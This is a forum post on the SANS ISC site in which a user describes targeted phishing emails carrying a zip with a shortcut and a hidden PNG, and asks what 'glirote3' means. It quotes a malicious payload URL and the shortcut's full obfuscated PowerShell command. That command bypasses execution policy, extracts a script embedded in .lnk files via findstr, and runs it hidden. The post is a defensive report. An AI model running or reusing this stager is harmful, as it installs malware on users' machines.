Threat Level: green Handler on Duty: Xavier Mertens

SANS ISC: Has anyone any ideas what "glirote3" -- malware powershell link. - Internet Security | DShield SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Has anyone any ideas what "glirote3" -- malware powershell link.
All,
Over the last couple of weeks I have received a couple of targetted emails with links to a zip file which contains a shortcut and a png file. When I say targetted they have the have my name and the main office telephone number along with postcode (i.e. zip code). Each email claims to be an order confirmation . The png file for some reason is marked as hidden, and the shortcut is actually a powershell link.

The link (reported to godaddy so may go soon hopefully)is:

https://rkbbeauty.com/.cabinet/838IZ46044-package-updated

The shortcut powershell command is:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c $no="po"wer"shel"l -win hi"dd"en -c "fi"nds"tr /s glirote3 $env:userprofile\*.lnk > $env:userprofile\Downloads\vvv"."p"s"1; & $env:userprofile\Downloads\vvv"."p"s"1"; start-process $no

Is anyone aware what glirote3 is as I am not turning up any references from a quick search
W60

14 Posts

Sign Up for Free or Log In to start participating in the conversation!